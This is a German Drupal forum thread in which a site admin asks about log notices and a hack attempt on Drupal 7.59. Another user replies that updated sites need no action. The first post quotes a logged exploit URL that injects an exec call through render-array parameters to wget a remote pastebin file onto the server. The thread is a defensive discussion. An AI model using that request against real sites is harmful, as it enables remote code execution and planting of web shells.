Startseite
  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche
Startseite › Forum › Drupalcenter.de › Allgemeines zu Drupal ›

[gelöst] Notices warnings und hack attempt in Drupal 7.59

Eingetragen von Jenna (1883)
am 30.05.2018 - 20:49 Uhr in
  • Allgemeines zu Drupal
  • Drupal 7.x oder neuer

Ich habe seit einigen Tagen in den Protokollberichten einige dieser Warnungen, die mit PHP angezeigt werden oder Zugriff verweigert.

https://www.drupal.org/project/drupal/issues/2975433

Zitat:

Notice: Undefined index: #prefix in file_ajax_upload() (line 287 of /var/www/html/modules/file/file.module)

, plus 3 - 4 weitere Meldungen, die sich auf ajax beziehen

und

https://www.drupal.org/forum/support/post-installation/2018-04-24/hack-a...

Zitat:

https://www.example.com/?q=user/password&name[%23post_render][]=exec&name[%23markup]=wget+-O+misc%2fAuthCommon.php+https%3a%2f%2fpastebin.com%2fraw%2fmibqDZX4&name[%23type]=markup

Kann jemand helfen, ich werde aus den Issues nicht schlau ob man was unternehmen muß? Was genau steht da soll man tun?
Module und Core sind natürlich auf neuestem Stand.

Ich kann keine Veränderung in den FTP Dateien feststellen, auch sonst läuft die Seite normal, trotzdem nervt das.

Die IP's zu diesen Zugriffen habe ich umgehend gesperrt.

Ja, liebe DSGVO... genau für so etwas braucht man Zugriff auf die IP, um die Sicherheit der Seite zu erhalten und das werde ich auch mit "Sicherheit" nicht ändern...

Grüße Jenna

‹ Fatal error: Allowed memory size - nach Umzug bei gleichem Provider [gelöst] Notices warnings und hack attempt in Drupal 7.59 ›
  • Anmelden oder Registrieren um Kommentare zu schreiben

Wie ich es verstehe, soll man

Eingetragen von eigentor (1424)
am 30.05.2018 - 21:09 Uhr

Wie ich es verstehe, soll man überhaupt nichts tun.
Man teilt in den Issues mehr die Info, dass es sich um Hack-Versuche handelt.
Die Versuche waren wahrscheinlich erfolglos, wenn du rechtzeitig upgedatet hattest.

In dem einen Issue meint ja einer, sollte man lieber die Notices ausblenden, weil das das Log zuspammt.
Vermutlich wirst du aktuell selber ein Modul schreiben müssen, wenn du die Sachen nicht geloggt haben willst.
Ich persönlich würde lieber den Spam akzeptieren und merken, dass jemand mich zu hacken versucht.
Ich habe immer so viel Error Spam durch aus Faulheit nicht gefixte Fehler in meinem eigenen Code, dass das den Braten auch nicht mehr fett macht...

rufzeichen-logo

  • Anmelden oder Registrieren um Kommentare zu schreiben

Die Meldungen sind rapide

Eingetragen von Jenna (1883)
am 10.07.2018 - 16:20 Uhr

Die Meldungen sind rapide zurück gegangen, da ich die IPs händisch sperre.. nur ganz vereinzelt taucht noch mal so ein Versuch auf.
Ich halte auch nichts davon Notices auszublenden, lieber etwas Handarbeit und man hat langfristig Ruhe..

Vielen Dank für deine Info (Updates hatte ich natürlich auch durchgeführt)

Grüße Jenna

  • Anmelden oder Registrieren um Kommentare zu schreiben

Benutzeranmeldung

  • Registrieren
  • Neues Passwort anfordern

Aktive Forenthemen

  • Umstellung von D10.3.6 auf D11.x Fragen
  • Nach letztem Update weiße Seite in den Einstellungen meines Themes
  • Anzeige lässt sich beim Medientyp Video nicht bearbeiten
  • Views: Anzahl in Feld mit mehreren Werten
  • Views Slideshow unvollständig
  • Modul Flag
  • Wo speichert das Theme Barrio Bottstrap 5 die local Librarie?
  • Maintenance mode läst sich nicht ausschalten
  • Upload limits
  • EXIF Modul
  • Anzeige der Anzahl der Posts in Taxonomie
  • Passwort Zeichen verlängern/verkürzten
Weiter

Neue Kommentare

  • Danke Werner und weitere Rätsel
    vor 2 Stunden 46 Minuten
  • 1) Jedes Projekt muß seine
    vor 13 Stunden 47 Minuten
  • ich versuchs nochmal
    vor 1 Tag 4 Stunden
  • Ich habe auch mit composer
    vor 1 Tag 5 Stunden
  • Ich muß mich korrigieren, ich
    vor 1 Tag 20 Stunden
  • der link verweist auf den
    vor 1 Tag 21 Stunden
  • Leider finde ich den Ordner
    vor 2 Tagen 59 Minuten
  • https://git.drupalcode.org/pr
    vor 2 Tagen 3 Stunden
  • PHP hat 2
    vor 2 Tagen 4 Stunden
  • funktioniert leider nicht
    vor 2 Tagen 15 Stunden

Statistik

Beiträge im Forum: 249595
Registrierte User: 19993

Neue User:

  • DavidSox
  • MartyCrymn
  • mittim

» Alle User anzeigen

User nach Punkten sortiert:
wla9420
stBorchert6003
quiptime4972
Tobias Bähr4019
bv3924
ronald3852
md3717
Thoor3678
Alexander Langer3416
Exterior2903
» User nach Punkten
Zur Zeit sind 0 User und 8 Gäste online.

Hauptmenü

  • » Home
  • » Handbuch & FAQ
  • » Forum
  • » Übersetzungsserver
  • » Suche

Quicklinks I

  • Infos
  • Drupal Showcase
  • Installation
  • Update
  • Forum
  • Team
  • Verhaltensregeln

Quicklinks II

  • Drupal Jobs
  • FAQ
  • Drupal-Kochbuch
  • Best Practice - Drupal Sites - Guidelines
  • Drupal How To's

Quicklinks III

  • Tipps & Tricks
  • Drupal Theme System
  • Theme Handbuch
  • Leitfaden zur Entwicklung von Modulen

RSS & Twitter

  • Drupal Planet deutsch
  • RSS Feed News
  • RSS Feed Planet
  • Twitter Drupalcenter
Drupalcenter Team | Impressum & Datenschutz | Kontakt
Angetrieben von Drupal | Drupal is a registered trademark of Dries Buytaert.
Drupal Initiative - Drupal Association